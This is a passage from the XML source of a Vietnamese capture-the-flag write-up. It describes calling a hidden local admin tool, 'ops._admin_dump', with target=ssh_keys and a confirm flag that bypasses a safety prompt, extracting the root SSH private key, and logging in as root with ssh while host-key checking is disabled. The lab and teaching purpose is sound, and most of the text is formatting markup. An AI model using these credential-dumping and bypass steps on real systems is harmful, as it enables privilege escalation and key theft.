    <w:p w14:paraId="64C384DC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ervice </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/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opsmcp</w:t>
      </w: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chạy trên </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/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127.0.0.1:5000</w:t>
      </w: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(chỉ bind local, đúng lý do vì sao trước đó phải pivot vào máy qua Jupyter mới gọi được). Request gọi thẳng tool ẩn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/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ops._admin_dump</w:t>
      </w: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với </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/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target=ssh_keys</w:t>
      </w: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, kèm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/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confirm:true</w:t>
      </w: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để bypass cảnh báo xác nhận trong code. Response JSON chứa field </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/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root_private_key</w:t>
      </w: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— dùng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/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python3 -c</w:t>
      </w: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để trích xuất ra và lưu thành file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/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/tmp/root_key</w:t>
      </w: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 w14:paraId="0E26798D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693920" cy="899160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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8E60A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="200" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSu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Dùng SSH key để đăng nhập root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA7EC3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chmod</w:t>
      </w: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600</w:t>
      </w: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/tmp/root_keyssh-keygen -y -f /tmp/root_key</w:t>
      </w:r>
      <w:r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ssh</w:t>
      </w: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-i /tmp/root_key -o </w:t>
      </w:r>
      <w:r>
        <w:rPr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StrictHostKeyChecking=</w:t>
      </w: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no root@127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0997696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chmod 600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: SSH yêu cầu private key phải có permission chặt, nếu không sẽ từ chối dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403BD81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ssh-keygen -y -f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: xuất public key tương ứng để xác nhận key hợp lệ/đúng định dạng trước khi dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB5542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ssh -i ... root@127.0.0.1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: SSH vào chính target (localhost từ góc nhìn của target) bằng private key vừa lấy được, đăng nhập trực tiếp với quyền </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9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root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 w14:paraId="106B960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4F93A9E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701540" cy="4556760"/>
            <wp:effectExtent l="0" t="0" r="7620" b="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7D5A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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9. Lấy flag root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br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="63000C51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701540" cy="701040"/>
            <wp:effectExtent l="0" t="0" r="7620" b="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B1970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2A3035"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A42A3035"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="200"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="14C0CD03"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="14C0CD03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247A28"/>
    <w:rsid w:val="12247A28"/>
    <w:rsid w:val="14765411"/>
    <w:rsid w:val="1B454F31"/>
    <w:rsid w:val="2B913AE6"/>
    <w:rsid w:val="2B914E86"/>
    <w:rsid w:val="34882444"/>
    <w:rsid w:val="44B433CD"/>
    <w:rsid w:val="5E485C96"/>
    <w:rsid w:val="612D29E6"/>
    <w:rsid w:val="69A4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paragraph" w:styleId="8">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24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1210</Words>
  <Characters>7667</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>118</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>10155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2026-07-03T13:05:00Z</dcterms:created>
  <dc:creator>Tú Ngô</dc:creator>
  <cp:lastModifiedBy>Tú Ngô</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-05T13:30:55Z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973737C989604265A2E065AAF4F8DCF1_11</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiMzcyODMxYTE0ZTc0ZGU3Y2QwODc3MzYzN2Q1YmNiM2EiLCJ1c2VySWQiOiIxMzkyMTA4NDM5NDU0In0=</vt:lpwstr>
  </property>
</Properties>
</file>